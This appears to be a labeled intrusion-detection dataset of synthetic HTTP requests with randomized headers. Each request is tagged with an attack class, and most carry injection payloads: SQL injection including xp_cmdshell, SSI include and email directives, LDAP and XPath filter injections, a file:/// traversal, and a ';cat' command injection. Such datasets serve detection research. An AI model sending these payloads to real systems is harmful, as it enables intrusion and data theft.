If-Unmodified-Since: Thu, 02 Feb 06 10:15:43 GMT
If-Match: *
If-None-Match: "b5Iin6Q.3RF3p.tS1"
If-Range: *
Max-Forwards: 403
MIME-Version: 3.3
Pragma: pHeo=soisHll
Proxy-Authorization: 8eEcs dejCatel=tunerro
Authorization: Digest opaque="8ohdh"
Range: 716-,83323-
Referer: /iisr/Otrno4ke/ucGmnn0/mkthltk/Edtee.pdf
TE: chunked
Trailer: Referer
User-Agent: Ohne6aar0 (nHUiWBov; e7f_jlRK; 4fgznG4NO)
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7179x0700
Via: wage9l/2.5 3.65.189.140, HTTP/8.9 www.iiaehtia.js, HTTP/0.7 180.7.214.179
Transfer-Encoding: compress
Upgrade: I8j/1.5, gc9ecr/7.1
Warning: 900 139.60.79.76 "ln9aeaneieNgnh6Hl" "Mon, 29 Jan 07 22:28:50 GMT"
X-Forwarded-For: 149.48.124.188
X-Serial-Number: 3908709
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35261
Start - Id: 41323
class: SqlInjection
GET /rC2/t2IauC/IHetcc/synuolu/pw2nbksir/nodec7inputLPb8dF/ddShtxelrsIi/rn0nS0ytaltNltbct/dOr5F0tzfNWqGaq/crdw9ba.css? HTTP/1.0
Host: 129.178.219.191
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 103.161.84.244
Cookie: R7FOZwZBzR='   )/**/UNIONALL/**/SELECT/**/04626/**/FROM/**/eto/**/WHERE/**/(''  =   '     /**/;sem=n7 sl
Cookie2: $Version="16"
Date: Fri, 11 Aug 06 07:04:20 GMT
ETag: W/"sdFxDg7wILRLPTL3czg"
Expect: 100-continue
If-Modified-Since: Sat, 07 Mar 09 05:10:16 GMT
If-Unmodified-Since: Sun, 17 Oct 04 24:51:42 UTC
If-Match: "hv7j1f@I896F-I6.P0"
If-None-Match: "TeUvy7zVD@40WNt"
If-Range: "5VO@FyvTtY0.PFp2siuY"
Max-Forwards: 4
MIME-Version: 0.2
Pragma: tg=aaer
Proxy-Authorization: Basic ckRwZWRzMjpyaHVhMlM=
Authorization: Basic bjJ0YWFoZ2Q6cm9yUGJrYmc=
Range: 4-
Referer: /Mentr/wuia/odHn49v.php4
TE: gzip;q=0.3,chunked
Trailer: If-Modified-Since
User-Agent: eah3phta4 (erXx-dfqeQ; rzn5fyQ34n; ou_MhwOxu; tMeFvN7K4J; nEgze2)
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 654x944
Via: FTP/5.7 www.egjoap.jpg:8, FTP/0.0 197.17.239.158:96928
Transfer-Encoding: elseh
Upgrade: z7mnyi/7.1, meohI/0.8, eOtfa/4.5, rnyaca/2.1, mina/5.4
Warning: 906 www.C8ogb.jpg "cflnxg4Nltoxcssnedi" 
X-Forwarded-For: 94.64.57.114
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41323
Start - Id: 39433
class: SSI
GET /jT1w/hyndE/ftgmfrih/7gsernnensnnwDnro/gctbzo9t/dYLB/nplRneuse0e/aG/9sIocx2Oyzraltnzhth/hJqwmaa/q@lnN/tWW9fDlwtoB.html?r8bj3p4sl3tr=ited+tea&07zoscn=3lwMase&yxODet2oLTug=15885&gtigeeuphj=openn&formw6zdbetweenW=Ahel8vlm6sti&XaBHXeZzs=39058758&exH=r3abnagilhe6t&xneniffal=irrugthRbee+e%28w&b6htdtodnTs7=dEOG0TTV&ps=%3C%21--%23email+fromhost%3D%22www.hDnr6a.com%22+tohost%3D%22mailbox.iih.com%22+message%3D%22hh0nim+oeenty+gdea+hineo%22+fromaddress%3D%22ienss.com%22+toaddress%3D%22dagow.aeshs.com%22+subject%3D%22N%22+sender%3D%22ir.com%22+replyto%3D%224r8uh.com%22+cc%3D%22rrE%22+inreplyto%3D%22tg5eu+sti+m8%22+id%3D%22oamail%22+--%3E&ay-g0HB=8aoe&aSs=dPjOFC9&inesuhimija=c3a5WrzM HTTP/1.1
Host: 204.123.110.168:80
Connection: ytxusrst
Accept: application/postscript;q=0.7, image/png
Accept-Charset: windows-1254, x-mac-arabic, iso-8859-6;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 166.48.94.150
Cookie: qt=c5au|H;zo9eprReh9uc=p7N-7-;iGibanl=game ;du6ruyr=o udocumentcesydabh;vBQlDr_XG=aF@nTJ7
Cookie2: $Version="308"
Date: Mon, 24 Jul 06 04:43:54 UTC
ETag: "-A3q_0z5h0Y@AJr8"
Expect: 100-continue
From: nitnd0Ry@sdsmmyeanh.ch
If-Modified-Since: Thu, 06 Dec 07 10:11:44 CET
If-Unmodified-Since: Sun, 20 Nov 05 16:43:22 UTC
If-Match: "o5j26.LaMUfb9Pnf-Yz"
If-None-Match: "B1F2-8jSm9IP8.gHa"
If-Range: Tue, 27 Mar 07 04:14:38 UTC
Max-Forwards: 00
MIME-Version: 3.5
Pragma: ht=hOmppd
Proxy-Authorization: rashN riiam=cssstki
Authorization: NTLM ZlNuZWUxaGE4cnJuaHBlQXJsZWVpb3RvZlVpNXFlY0VpaWFwbmU=
Range: -07524
Referer: /EtierEsb/oittg/hxej/iettlv8.pl
TE: trailers,deflate,chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.1 (Machintosh; U; Mac OS X 1.7; bc-he; rv:1.3.9) Gecko/21344305
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 162x589
Via: ewgomt/6.2 www.mkltARel.htm, 8.3 www.1tngt.js, 1dhu/4.0 www.sfex.html
Transfer-Encoding: compress
Upgrade: Elhojr/2.6, ocoxo/3.7, here8i/5.4
Warning: 280 113.181.5.189:613 "neo5iip" "Wed, 20 Feb 08 05:16:28 CET"
X-Serial-Number: 7022355683967600
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39433
Start - Id: 37863
class: LdapInjection
GET /iDamTwSM/uiat/w.H7Gv@YHQ-r6/ulre/lI6Me/oy9hcndul4hAroro/M_Jl/bednis/74nflV0Cv@.cfm?lCdsOAt=8open%3Csock_streampnhavinghol&nS=%29%28+++%7C++++%28cn%3D*o+%27brien*+++%29%28mail++%3D*o++%27brien*++++%29++++ HTTP/1.1
Host: 97.78.164.75
Connection: ieiu
Accept: image/jpeg
Accept-Charset: windows-1252;q=0.0, x-mac-ce;q=0.3, windows-1257;q=0.3, iso-8859-8;q=0.4
Accept-Encoding: *
Accept-Language: ocqtg8n-np, rtrni-aAowerhP, fbkht-hieni;q=0.4
Cache-Control: no-store
Client-ip: 39.35.248.126
Cookie: tsboBouTeh2=097;9Baccepttf25gvWzO=qadocumentj;cqT6d=47715776;feg3g=sock_streamfham;n2ttra=rila;hoBbzii9eesqh=vEbfu asho5
Cookie2: $Version="7"
Date: Fri, 17 Jul 09 06:33:43 GMT
ETag: W/"q1tKCA39t79UyUd9"
Expect: ealdo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Fri, 13 Apr 07 06:59:51 CET
If-Unmodified-Since: Sat, 27 Jun 09 07:00:07 GMT
If-Match: "c6FC5Mm@FvNAWs."
If-None-Match: *
If-Range: *
Max-Forwards: 2909
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Atfeo UKet=rucegw
Authorization: NTLM cG1mbHRxRXVpbnI5bHRpb3Rpb2E3d25lYWxkcDRpbnlzb3Q=
Range: 3-43,-454,28574-
Referer: http://www.tn3anbm.de/dcgd/ea0xmka.php4
TE: trailers,chunked;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.4 (X11; U; Open BSD i586 7.4; es-st; rv:8.4.6) Gecko/26800170
UA-CPU: Sparc
UA-Disp: 8628,0806,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 649x451
Via: 6.2 59.157.180.46
Transfer-Encoding: compress
Upgrade: obeThi/2.4, ems/4.7
Warning: 785 154.219.196.57 "riredam4aosbhnieNsek" "Wed, 10 Jun 09 10:24:56 CET"
X-Forwarded-For: 223.104.48.29
X-Serial-Number: 300384
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37863
Start - Id: 37900
class: LdapInjection
GET /hL0H2psE@Ig@sepz@/9ICyP0tVMqllyFI0zEHU/iF5v-sai0czPLPty.html?6bo=700031&o9lsZI=9&its=51362337&cy8clseepare5r8=lsdo%2Be&teErn=Uaetccl+h6gRma+&GUaqtmpcpassthru=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&stanUtac=yvI.Y6Mw4-Pv&6RdesiseBHebit=n1o&iassautaa8da=2549769&i0eeOwattlnmo=tgf9s HTTP/1.1
Host: www.rtEiertioh.biz
Connection: haye
Accept: audio/x-wav, text/xml;q=0.7, text/html
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.3, compress, identity;q=0.7
Accept-Language: 7trhpr-ree, sm1-etioosh4, e-yaa4, rD-ieil9aot;q=0.0
Cache-Control: no-cache
Client-ip: 201.60.207.156
Cookie: eeitcyn7=eXiH
Cookie2: $Version="1"
Date: Mon, 02 Feb 09 17:01:30 UTC
ETag: W/"k_eK26HPsis_XTtOs"
Expect: 100-continue
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Sat, 28 Feb 04 01:30:30 GMT
If-Unmodified-Since: Mon, 08 Nov 04 22:17:32 GMT
If-Match: *
If-None-Match: "KPyQYS3ZDOJzjYnPKR"
If-Range: "RMgMI-CTfjQkK3iPH"
Max-Forwards: 187
MIME-Version: 1.5
Pragma: hthneo='r'
Proxy-Authorization: Digest realm
Authorization: viol wsolm=aeyhuO
Range: -004662,03-,-2001
Referer: /aBsoch/hTrae/dicy9e/betaanwA.asp
TE: gzip
Trailer: User-Agent
User-Agent: Mozilla/4.1 (X11; U; Open BSD i386 6.2; b8-l8; rv:4.2.5) Gecko/06741383
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: HTTP/0.2 119.228.223.248, al0nfh/7.5 185.120.69.131
Transfer-Encoding: gzip
Upgrade: 1tena/5.3
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 568407
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37900
Start - Id: 41019
class: SqlInjection
GET /6mvVq5MGK@nV3JDZ_wl2/x-/eraki3u1fc2sl8a/omCaWadminH/HgB5/pdFaaeaaaceto/rfMda@71uHLu/ej0m@99eghvwXiNIanRj/iIwBTjZi17.asp?stLeotla7ayyp=77912&daq9c=4461&Ext6veme1jorgr=20&rdoeeot=l3ni-%40esr5%5Csa+&TAknsie2Tvn=Jeea1tew&rwLdpeon=9O90&6saImid2c1gr=%29ar&uAEWn_.sx7=o&_DZGLsKiWTE=eiet&wDRfJKconnectiframeQQ=5n+tea&8l1iahaEx7c=%27%3BEXEC+master.dbo.xp_cmdshell+++%27cmd.exe HTTP/1.1
Host: www.lEnnhpunne.cz:0763
Connection: stge
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: lTXnIso-thsfuu;q=0.8, eehsof-hOhRadhi;q=0.9, snDn1-nh2sIc;q=0.8
Cache-Control: no-transform
Client-ip: 109.121.222.214
Cookie: wz0iefo9yuy=6nCsy
Date: Fri, 04 Sep 09 15:17:58 UTC
From: nr8inpt@ayntTOpcTs.it
If-Modified-Since: Fri, 20 Feb 09 11:58:44 CET
If-Unmodified-Since: Wed, 24 Feb 10 06:04:02 GMT
If-Match: "xDdeGdPCY0X-Ouk4"
If-None-Match: *
Max-Forwards: 2
MIME-Version: 5.4
Proxy-Authorization: Basic Ymxld3Vobm46ZWV0dGU=
Authorization: NTLM ZGgzeWk5RmU5ZW9saHV6Z250YW50dWF5aWtvb25BaHpuYU5uaWFub203YnBI
Range: 770-,-93926
Referer: http://www.rdeZtcf.be/e8nlahw/r7trfo.swf
TE: trailers,trailers,gzip;q=0.9
User-Agent: Mozilla/4.4 (compatible; ubacttA0r; WinNT; lekbla7J; cIe7eoac3k; wreot)
Transfer-Encoding: compress
Upgrade: izM/5.7, 1eiDbt/4.4
Warning: 484 www.41xtiu.shtml "ffgplwga7ia3nttt" "Sun, 25 Apr 10 04:50:48 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41019
Start - Id: 42273
class: SqlInjection
GET /xAto4@/gI@/sa/bUTjTD86MqqdG0.Y/ae6yll3rhr2aidSi6s/nDJqxs1ErAH.nsf?ROBLwg=3686805051&hhmonrYBy=hg%7Cpositionnnii&dea0Om=Otn%3Es&mPPdOzwindow.openIgprocessing-instructionA=s&rKFdocument6bB=T%285Hg6e4ish2icneoyt&brrr=%27+++++group+by++++users.id+++++having++68%3D68&hR=2378 HTTP/1.0
Host: www.wffntch0.net:80
Connection: close
Accept: image/png, audio/x-wav;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: ao1aaaW-7clm1cm
Cache-Control: only-if-cached
Client-ip: 241.101.146.87
Cookie: WWo8dB=679719;7w4p7i4eu1=hic;oisie0otgisg=dis9tofeIheho;til
Cookie2: $Version="520"
Date: Sat, 24 May 08 20:48:38 CET
ETag: "cQI1KzijYNcy.dQfk"
Expect: sRremose
From: eethwr@T5iivnsieh.be
If-Modified-Since: Fri, 05 Mar 10 18:21:07 CET
If-Unmodified-Since: Sun, 28 Mar 04 16:15:54 UTC
If-Match: *
If-None-Match: "k.6zp6wLzF7tn3HWj"
If-Range: Fri, 04 May 07 23:40:22 UTC
Max-Forwards: 764
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: Digest username="jiE2t"
Range: -949568,-7
Referer: http://www.hssn.st/2Oiaoje/eextidb/ehrmtr/aeabeo7h.jsp
TE: chunked;q=0.2,chunked;q=0.3,gzip;q=0.8
Trailer: From
User-Agent: Mozilla/6.6 (X11; U; Solaris 6.3; wa-nh; rv:1.8.2) Gecko/57485771
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0775x379
Via: 5.7 www.leXagn.shtml, 5.1 www.rQ1pt.html
Transfer-Encoding: 3flnn; hs5rnegd=i5sia
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 301 34.243.209.148:30161 "olzejaFnho9ieieodT" "Fri, 02 Jan 09 11:48:48 CET"
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 280200406213
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42273
Start - Id: 37589
class: LdapInjection
PUT /mue0fonr.swf? HTTP/1.1
Content-Length: 137
Content-Language: et,etseczuT,o3qsn
Content-Encoding: identity
Content-Location: /m0au1awg.nsf
Content-MD5: YWJ5UWFob21va2ltd2owcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Sep 08 05:42:35 GMT
Last-Modified: Thu, 01 Sep 05 06:06:05 GMT
Host: www.stoh3.uk
Connection: keep-alive
Accept: video/quicktime;q=0.0, image/gif
Accept-Charset: *
Accept-Encoding: gzip;q=0.8, gzip
Accept-Language: lreeaTte-wa, tzj-rc;q=0.3
Cache-Control: no-transform
Client-ip: 229.175.84.16
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="870"
Date: Wed, 01 Apr 09 02:36:21 UTC
ETag: "UAjJPkU4pbELI5JKyA"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Tue, 31 Jan 06 03:11:46 GMT
If-Unmodified-Since: Sat, 29 Oct 05 24:35:27 GMT
If-Match: "hR_Kyx.95MZ@6ZTl5Ian"
If-None-Match: *
If-Range: Fri, 17 Aug 07 14:28:37 CET
Max-Forwards: 3734
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest qop=Sogaol
Authorization: NTLM aXRvYXBhbnVvbFdadnBhb29zaWVscnN0dGh1dHI1bW5hYW50bGVDZXd1YWU=
Range: 3-46,1783-444359
Referer: http://www.ssvE.uk/lWppYE/eqgonae/eamcn/ivmsF/ln7jt.mpg
TE: deflate;q=0.6,chunked
Trailer: Max-Forwards
User-Agent: hioA/4.5.8.9
UA-CPU: PowerPC
UA-Disp: 0007,792,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4454x553
Via: 9.2 www.ftyrig.png, 1.5 197.224.105.54, FTP/6.1 www.enixntoi.png
Transfer-Encoding: gzip
Upgrade: vYs/1.2
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35061677814454
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tokinncW=ee)(&(objectClass  =  knr*)&ahsuf6aoS=6298312034&FoEGnetcat7Tfifd=h@2hfBYTUXKW&YOdZayehnww0h=659142&tn=awFX-DKOjtt

End - Id: 37589
Start - Id: 39034
class: LdapInjection
PUT /w0nuvtmQTh_/zbSnCdsilebdtHoc/p5lJe/Gih/rLi/8vauh64jp/whuh9pes.mdb? HTTP/1.1
Content-Length: 90
Content-Language: o,rnOtbe,hEntHimr
Content-Encoding: gzip
Content-Location: /hodhohn/NO4mtb/nxnsC/NU1fd/yN7mipsr.dll
Content-MD5: dEJsckNwNmFlaGVzbDdzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Jun 07 24:01:58 GMT
Last-Modified: Mon, 11 Apr 05 03:09:16 CET
Host: www.eohmtyj.uk
Connection: oL2osj2n
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: ) (| (    cn=*o 'brien*    )(mail   =*o'brien* )   
Cache-Control: no-store
Client-ip: 73.239.50.202
Cookie: WDcopyfD-=xM9W_LgrH
Cookie2: $Version="31"
Date: Thu, 20 Nov 08 17:28:57 CET
ETag: "m.zvaF9l0uX5MvZcQ"
Expect: 100-continue
From: 6eGtzO@aUa6ae0S.fr
If-Modified-Since: Wed, 15 Jul 09 06:17:50 CET
If-Unmodified-Since: Sat, 23 May 09 10:59:02 UTC
If-Match: *
If-None-Match: "OmKziVlugxBkMcPanV"
If-Range: Tue, 18 Apr 06 12:43:13 GMT
Max-Forwards: 700
MIME-Version: 9.1
Pragma: oy9af='rpnA'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic YWVvZTpzc1RvM0l0
Range: -0298
Referer: http://www.9eisetu.cz/oiaCd/esyun/nnaifr.aspx
TE: trailers,gzip;q=0.4
Trailer: Trailer
User-Agent: Mozilla/7.1 (Machintosh; U; PPC 8.1; pn-0i; rv:1.1.4) Gecko/85703609
UA-CPU: PowerPC
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 699x217
Via: 5Uee/7.0 www.eTrnot.gif, HTTP/7.8 www.ufldWm2.tiff
Transfer-Encoding: deflate
Upgrade: ne66ft/5.8, ziI/5.3, ofii/1.2
Warning: 658 www.5nnyaqt.jpg:82110 "coUeCYctEacH" "Wed, 16 Jun 04 09:17:55 CET"
X-Forwarded-For: 84.228.185.10
X-Serial-Number: 6446333
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3S6Y=from&hhhouzep0H=i8r18hS19rd&ssocN1e5qlcrcpo=yNcap&sXIyadocumentJVpositionSc=c-2LDDmQK

End - Id: 39034
Start - Id: 44826
class: PathTransversal
GET /ac4RbKRs.nsf?rMywfelrteZ9=collection%28+file%3A%2F%2F%2Fc%3A%2FsAa%2Foiiie0E.xml++%29 HTTP/1.0
Host: www.alhtefcs.net:7892
Connection: utnq6eba
Accept: audio/*;q=0.7
Accept-Charset: iso-8859-6;q=0.3, windows-1257
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 92.163.213.217
Cookie: tsretBb=vnPcaati4tw
Cookie2: $Version="23"
Date: Wed, 22 Feb 06 14:53:22 UTC
ETag: W/"45NPbgutQsMuP7R"
Expect: awtysiqo
From: eosehi@IsoiaSe.uk
If-Modified-Since: Sun, 07 Jun 09 04:15:13 CET
If-Unmodified-Since: Thu, 26 Feb 09 05:01:22 CET
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: *
If-Range: "AwNEyj99C2j5zSWS"
Max-Forwards: 7937
MIME-Version: 9.8
Pragma: S=n
Proxy-Authorization: dsect8 atir0rto=aaeeis
Authorization: eH4teM jsxnoc=5ihxiqi
Range: -7,891-,-651
Referer: http://www.ypesaobI.biz/ahialntu/tl7w3sa2.jsp
TE: trailers
Trailer: From
User-Agent: Mozilla/2.4 (Windows; U; WinNT 1.1; wb-e9; rv:7.3.2) Gecko/03050526
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 123x704
Via: HTTP/8.2 www.feet9sc.js, 1.1 www.ieoBerho.html
Transfer-Encoding: niet; toiedssh=eyswno
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 279 5.34.104.253 "ycytrdqnsuf" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44826
Start - Id: 40504
class: SSI
GET /tG6bHgSdyi/_M/telnetBnJydiv4passthrusYQmCo/lik6cBHvp.jDF-Y8@0R_/m7zgJDsxvqG0KdIJIK.l/iSg8@Ac9Q3.aspx?7snhNus2Pei=dkFbEO3&lolro6da=%3C%21--+++++%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&SdegYTyjoc7ite=azHQ42p&MoyfiCrNx4ernd=nSsdahmno&tuyRl=osa%7E%28atibohtaccesaes3&DMYnbukEk=ser&eSdEati5mO=h%25%287TKGuoai8a&lsL5ate=648457 HTTP/1.1
Host: www.weeag.cz
Connection: sdeEed9z
Accept: audio/*, video/*;q=0.2, text/html;q=0.6
Accept-Charset: cp-936, us-ascii;q=0.0, us-ascii, x-mac-arabic;q=0.1, windows-1254;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.0
Cache-Control: max-age=41
Client-ip: 68.175.116.43
Cookie: siifsttpAe=Gnrsr;8stzyq=<et\d;tmst=odue
Cookie2: $Version="510"
Date: Wed, 20 Aug 08 15:30:10 GMT
ETag: "TXYIwLxIT0rM9x@OnOW"
Expect: 100-continue
From: pe1n3lw@grPaOzeer.st
If-Modified-Since: Tue, 05 Oct 04 15:30:16 UTC
If-Unmodified-Since: Thu, 27 Apr 06 14:54:00 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 01 Jul 07 05:04:56 CET
Max-Forwards: 075
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM RWV0b1dIcmVlbkZoZnJyc3RwRGFSM3JobmN1ZW54aUFlbml4NTZodE9waWw=
Authorization: NTLM b2VmdHNzOHRzbmtuaHRvYW10aXNUdGVpZWVhMG5lZ2VmbnJ0OXN0cmVlZXI2dA==
Range: 51862-,762075-08,9969-2
Referer: http://mtee.org/rboio/tHt6fx2c/sdmakgle/z68btoiE/chlcsr.wmn
TE: gzip
Trailer: Accept-Language
User-Agent: Mozilla/3.8 (Machintosh; U; PPC Mac OS X 1.8; Rs-vP; rv:6.1.4) Gecko/34371253
UA-CPU: 68000
UA-Disp: 591,998,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 278x2627
Via: 4.2 109.169.206.32
Transfer-Encoding: compress
Upgrade: aen/1.7, T2itt/0.2, tnb/0.4
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 7235239060397255727
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40504
Start - Id: 35433
class: SqlInjection
GET /hOKLKw_pm/TShu2islnhrra2leb4tv/zmp-/unesurnhn/3t5CvGOl/Z3n4chlC-@5rPtn/ghduakngvaAhGnn6eeat/nN/ns48th9eFdd4odtsy4e/vrYGmuobac5jcnl/iiaur1hiohrV/aY4.bin?fpmjYOR=%26%3Dss%2Focs&ro=9grsh&edrqEsro6e0rc=hyHJsI%408d&rIe9fointluo=emnA4eedud&ZykG2oxGfchild0=905279&tamnnWnni7y=aEprSe15vLWx&c8UvcYnstdin2d=++++OR+++++2++%3E++++1&mae2swaog=devalsreimrn3gea%24 HTTP/1.0
Host: www.hpmOhe.com:80
Connection: nsry
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: ethInse='n'
Client-ip: 251.7.125.194
Cookie: tReH=d2YqD;wbeae=27680106;2ln=9156;rswutu6aeatiyl=uslsadaHoncivUlNti
Cookie2: $Version="8"
Date: Tue, 28 Oct 08 24:45:25 UTC
ETag: W/"HFxe_V9toQg18oq"
Expect: 100-continue
From: wgttuate@lrahn.uk
If-Modified-Since: Sun, 17 Aug 08 16:18:47 UTC
If-Unmodified-Since: Thu, 06 Aug 09 15:31:01 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 093
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: NTLM ZWllYWFub2lSc3Nyc21VbnJwYWVtZWNudWF1dU56MW90d3BvbGhhdWNh
Authorization: Basic bzJoa21naWU6YUdudHlt
Range: 8-411,02-393,-64
Referer: http://kh6sc.be/i52rsemn/eeaien3.tar
TE: deflate,gzip
Trailer: Trailer
User-Agent: Mozilla/0.0 (Machintosh; U; PPC Mac OS X 0.9; ts-su; rv:6.2.3) Gecko/93034345
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4231x7309
Via: ufo1i5/7.0 www.otrh.jpg
Transfer-Encoding: compress
Upgrade: hMhCah/0.2
Warning: 213 www.ha181.png "anao" "Fri, 28 Dec 07 24:10:22 UTC"
X-Forwarded-For: 115.143.230.10
X-Serial-Number: 323144017545
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 35433
Start - Id: 44544
class: OsCommanding
GET /bin/8e.pl/seite=;cat eshop.pl|? HTTP/1.1
Host: 242.222.49.183:59
Connection: close
Accept: */*;q=0.3
Accept-Charset: cp-932, iso-10646-ucs-2, windows-1252;q=0.7, x-mac-chinesesimp;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: Eie7dMm-dyu
Cache-Control: no-store
Client-ip: 15.83.253.70
Cookie: Pqtdrop8=71879
Date: Tue, 24 Nov 09 05:16:31 UTC
ETag: "jkPmPul2szt6mLKeLP"
From: 8ofb@eetrrga.de
If-Modified-Since: Wed, 08 Nov 06 22:00:48 GMT
If-Unmodified-Since: Sat, 01 Oct 05 24:33:49 GMT
If-Match: *
If-None-Match: "pIRxJZZe33nH.B71FO"
If-Range: Thu, 01 Feb 07 18:09:19 GMT
Max-Forwards: 243
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic YXJucGF4bnM6Rm90aGl6
Authorization: NTLM eUVhdFlmbnJkd2U0bWh3cmVOdGlvZmQ5aG95ZWRkc3k=
Range: -06354,383-6635,26244-
Referer: http://yisni.ch/Apmtlst.mspx
TE: deflate;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.5 (Windows; U; Win98 6.6; ff-nm; rv:2.0.0) Gecko/70878679
UA-Pixels: 069x3705
Via: 6.0 www.rmHi6x.shtml:820, 2.0 52.249.176.251
Transfer-Encoding: deflate
Warning: 178 www.psrrz.gif:1 "5eiuelyVouirXa" 
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44544
Start - Id: 48367
class: XPathInjection
GET /e8iIEp4yAqb_jq4/Nssqe/parRsahatnhopg7g/tFdm7Ey8nSj9riE7/njeeeosevenerOb.tiff?11r=+5v%5B&WiRtkr=Es&ZvAHL=97&mtFiho=r_-WR2aV&etine=++&euto=8139667&rcK4loog7tea2=q%3Ftr0a&rhnipg=04pjsegngbodbi1&6edaoehhAnn5A=8tcju&ewsiheh5i=23379242&Eh6Ubahra6=18809 HTTP/1.0
Host: 31.171.167.15:8505
Connection: close
Accept: audio/*;q=0.6
Accept-Charset: x-mac-ce, iso-8859-2, x-mac-arabic;q=0.8, iso-8859-4, windows-874
Accept-Encoding: 9ti0pet' or   path/child::node()[position()=N]  or 'lufuyCc'   ='
Accept-Language: *
Cache-Control: lf=w
Client-ip: 27.47.123.175
Cookie: WIQandutelnet=5262;tfuesetnnes=r2rled1Vceiaeise;hethn=rooebai9pbmacbCiet;ersgb=hdEWrTcopyeeat;90GacceptVdpUMm=hEFLdA0-RGAi
Date: Thu, 23 Jul 09 19:03:05 CET
ETag: "NYR8UqwqlTgjYhohloi3"
Expect: ertOneop
From: s5al6B3@ostl.it
If-Modified-Since: Fri, 29 May 09 14:02:28 CET
If-Unmodified-Since: Sat, 16 Sep 06 12:25:59 CET
If-Match: "lat4Vj7FALxclsVQc"
If-None-Match: *
If-Range: Thu, 29 Jan 04 24:06:00 UTC
Max-Forwards: 9
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: 5rEtt zyep=iae9id
